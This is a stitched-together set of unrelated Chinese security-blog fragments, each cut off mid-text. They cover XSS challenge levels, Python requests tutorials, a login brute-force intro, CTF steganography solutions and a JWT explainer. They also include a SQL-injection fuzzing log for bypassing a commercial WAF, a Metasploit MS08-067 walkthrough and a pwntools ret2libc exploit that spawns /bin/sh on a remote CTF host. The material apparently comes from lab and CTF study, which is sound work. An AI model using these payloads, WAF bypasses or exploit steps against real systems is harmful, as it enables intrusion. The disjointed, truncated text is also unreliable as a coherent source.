payload

网址：http://test.ctf8.com/ level1 通过修改url可以修改页面显示，判断是反射型xss，利用点在url。 payload test . ctf8 . com / level1 . php ? name = < script > alert ( 1 ) ; < / script > level2 输入信息在form的input里面，需要把input标签闭合 payload " / > < script > alert ( 1 ) ; < / script > level3 第1步：把level2的payload贴过来 并没有成功，可以看到输入的信息全部被放在value的双引号中，可能是php给过滤了。 第2步：输入一个1看看 1也自动被双引号括起来了。(到这里我就不会了， 找writeup) 第3步：输入一个单引号，可以把value的双引号闭合。 第4步：加个单引号试试 '<script>alert(1);</script> 这样就可以闭合双引号了，接着闭合input标签就可以执行js代码了。这里利用input标签的属性。 第5步：构造 ' onclick=alert(1) 看样子差不多了，后面在加个注释试试就成功了。 payload 'onclick = alert ( 1 ) // level4 第1步：使用 "onfocus=alert(1)

安装 pip3 install requests 使用 发送请求 import requests r = requests.get('http://www.baidu.com') 还可以如下方式发送不同类型请求： r = requests.post('http://httpbin.org/post', data = {'key':'value'}) r = requests.put('http://httpbin.org/put', data = {'key':'value'}) r = requests.delete('http://httpbin.org/delete') r = requests.head('http://httpbin.org/get') r = requests.options('http://httpbin.org/get') 传递URL参数 import requests # 传递字典 payload = {'key1': 'value1', 'key2': 'value2'} r = requests.get("http://httpbin.org/get", params=payload) print(r.url) # http://httpbin.org/get?key1=value1&key2=value2 # 传递字典套列表 payload

requests Python 中一个易用的网络请求库 来源 官方文档 中文文档 GitHub 使用 发送请求 r = requests.get('https://api.github.com/events') r = requests.post('http://httpbin.org/post', data = {'key':'value'}) r = requests.put('http://httpbin.org/put', data = {'key':'value'}) r = requests.delete('http://httpbin.org/delete') r = requests.head('http://httpbin.org/get') r = requests.options('http://httpbin.org/get') 传递 URL 参数 # 字典里值为 None 的键都不会被添加到 URL 的查询字符串里 payload = {'key1': 'value1', 'key2': 'value2'} r = requests.get("http://httpbin.org/get", params=payload) 响应内容 import requests r = requests.get('https://api.github.com

0x00简述 本文从零开始介绍一个网站登录爆破脚本的编写过程，通过脚本模拟网站登录的作用有以下几点： 1，web类安全工具需要一个强大的爬虫爬取目标网站的所有页面，以确认漏洞利用点。 如果遇到需要登录才能爬取的情况，可以爬虫直接模拟登录过程。 2，已知部分信息，爆破网站后台，为下一步的渗透做准备。 关于登录爆破在《blackhat python》这本书中有一个例子，但是我用requests和beautifulsoup做了一些修改，后续还会以此为基础添加更多的功能。 0x01网站的认证过程 要模拟登录网站就要知道网站的登录认证过程，这里以joomla这款开源cms为例。 配置浏览器使用代理，本地127.0.0.1 8080端口，我使用了owasp zap 这款工具，其他的工具如Burpsuite或者直接F12 都可以查看到包的信息。 第一步，首先访问后台登录页面，抓包查看发现返回包中包含“SetCookie”响应头，cookie此时作为认证用户身份的凭据，且每次访问都会改变。 第二步，接着POST方法提交登录信息，同样抓包查看 可以看到包里的参数不只有账号密码，还有token（用于防御CSRF）还有task等等。 认证的同时要抓取页面表单的其他input标签的name和value。joomla的较为简单，网站一般不会明文传输用户名和密码，遇到这种情况需要分析引入的js文件

MISC 签到题 扫码关注微信公众号即可获得flag 这是一张单纯的图片 用UE打开如图，在ascii码最下面发现一串编码，发现是字符实体编码。 https://www.qqxiuzi.cn/bianma/zifushiti.php 网站在线解码可得flag 隐写 打开图片，先用stegsolve跑一边没有发现什么，LSB也没有什么，用UE打开也没有什么奇怪的。用binwalk跑一边，没有隐藏文件。 所以考虑是不是高度修改，在IHDR后面将高度改大一些，果然发现flag ## telnet 用wireshark打开流量包，在telent包的data中发现flag 眼见非实(ISCCCTF) 下载文件后，用UE打开发现是PK开头，则是zip压缩包 改后缀后解压得到一个docx文件，猜测可能是zip包。 docx文件本质上就是一个zip压缩包，文件内容在zip压缩包中（文本内容，字体格式等等）。 改后缀为zip后打开 发现一些文件，没有明显的flag信息，但应该就在这些文件里。 一个个用firefox打开，F3快速查找。 得到flag. 啊哒 下载后发现是jpg文件，可能不是LSB隐写（png才有lsb隐写），用stagsolve跑了一下果然没有。用UE打开发现文件比较大，可能有藏东西。 用binwalk跑一下，果然有zip文件。 而且就是flag.txt

什么是JWT 　　Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准（ (RFC 7519 ).该token被设计为紧凑且安全的，特别适用于分布式站点的单点登录（SSO）场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息，以便于从资源服务器获取资源，也可以增加一些额外的其它业务逻辑所必须的声明信息，该token也可直接被用于认证，也可被加密。 Token认证和Session认证的区别　 　　传统的session认证 　　　　我们知道，http协议本身是一种无状态的协议，而这就意味着如果用户向我们的应用提供了用户名和密码来进行用户认证，那么下一次请求时，用户还要再一次进行用户认证才行，因为根据http协议，我们并不能知道是哪个用户发出的请求，所以为了让我们的应用能识别是哪个用户发出的请求，我们只能在服务器存储一份用户登录的信息，这份登录信息会在响应时传递给浏览器，告诉其保存为cookie,以便下次请求时发送给我们的应用，这样我们的应用就能识别请求来自哪个用户了,这就是传统的基于session认证。 但是这种基于session的认证使应用本身很难得到扩展，随着不同客户端用户的增加，独立的服务器已无法承载更多的用户，而这时候基于session认证应用的问题就会暴露出来. 　

QQ交流群：876554035 #01 环境简介 服务器：windows2008 R2 软件：phpstudy20180211 php 5.4.45 mysql 5.5.53 某锁win_3.1.18.13服务端版本 #02 Fuzz过程 以基于union注入为例 fuzz order by 过程如下： ?id=1’ order --+ 不拦截 ?id=1’ order by --+ 拦截 nna那应该是waf匹配了order+by ?id=1’ order / !by / --+ 拦截 ?id=1’ order / !60000by / 1 --+ 不拦截，但是报错 翻译过来：您的SQL语法有误； 检查与您的MySQL服务器版本相对应的手册，以在第1行的’1-'LIMIT 0,1’附近使用正确的语法 那么猜测是要低于mysql的版本吗?(我在fuzz某狗的时候里面的数字要高于50000以上，可能某锁要低于mysql版本，便随便试了个200000) ?id=1’ order / !20000by / 3 --+ 不拦截，且执行成功 ?id=1’ / !20000order /by 3–+ 不拦截，且执行成功 ?id=1’ / !20000order /by 4–+ 用过狗payload去试试，首先替换空格 ?id=1’ order/**/by --+ 拦截 ?id=1’ order

这几天看了几篇msf内网渗透，shadon入侵摄像头，入侵安卓机的文章，觉得msf确实是一款利器。有人说msf的出现让任何人都可以成为黑客，因此打算这几天学习一下。 在kail中自带了msf msf一般会和nmap搭配使用 nmap扫描开放端口，ip地址等基本信息。然后msf设置荷载。 windows xp sp3远程控制 启动msf，在这个msf里已经存在了这个漏洞的样本，可以拿来直接用，远程执行的代号是08-067 搜索到了这个漏洞完整的路径之后，就要使用这个exploit show option查看我们哪些项需要配置 这里的这个RHOSTS就是我们的目标机，靶机也就是要攻击的这个Windows2003的ip地址，在Windows直接cmd ipconfig就可以才看到ip 直接set RHOSTS ip 那个445端口是默认的，我们不用管，直接用这个445端口就可以。 之后选择攻击荷载（payload） show payload 之后会弹出很很多攻击荷载的样本 所有的荷载加起来差不多100多个，选择最常用的那个，当然这些各有不同，功能也完全不同。 靶机的一些参数已经设置成功了，现在需要设置攻击机了，我这里也就是kail 都设置好后需要找一个对应靶机相应版本的payload MSF> info查看对应版本 我这里用的是XP SP3 找到对应版本设置 set target 34

仰望一下 大佬 from pwn import * r=remote('node3.buuoj.cn',29989) elf=ELF('./bof') read_addr=elf.symbols['read'] write_addr=elf.symbols['write'] main_addr=0x804851c bss_addr=elf.symbols['__bss_start'] def leak(addr): r.recvline() payload='a'*0x6c+'b'*0x4+p32(write_addr)+p32(main_addr)+p32(1)+p32(addr)+p32(0x4) r.sendline(payload) leak_addr=r.recv(4) return leak_addr d=DynELF(leak,elf=ELF('./bof')) system_addr=d.lookup('system','libc') payload='a'*0x6c+'b'*0x4+p32(read_addr)+p32(main_addr)+p32(0x0)+p32(bss_addr)+p32(0x8) r.sendline(payload) r.sendline('/bin/sh') payload='a'*0x6c+'b'*0x4+p32(system

注入工具 　　上一篇介绍了SQL注入漏洞以及一些手工注入方法，本篇介绍一下注入工具 　　1、sqlmap 　　　　sqlmap属于比较经典的一个注入工具，功能强大，还自带一些绕过参数 　　　　使用方法： 　　　　　　sqlmap.py -u “url” 对url连接进行注入检测 　　　　　　然后使用注入参数进行注入 　　　　　　-u //添加url进行检测 　　　　　　-dbs //进行数据库检测 　　　　　　-tables //猜解数据库表 　　　　　　-colums //猜解字段 　　　　　　--level 1~5 //设置注入等级最高5级 　　　　　　--risk 1~3 //设置危险等级 　　　　　　--data “参数内容” //post注入 　　　　　　-r 1.txt //对1.txt内容进行注入 　　　　　　--delay //延时 　　　　sqlmap自带绕过脚本temper 　　　　使用方法： 　　　　　　--temper 脚本名称 　　　　列出一些脚本： 　　　　　　apostrophemask.py 用UTF-8全角字符替换单引号字符 　　　　　　apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 　　　　　　appendnullbyte.py 在payload末尾添加空字符编码 　　　　　　base64encode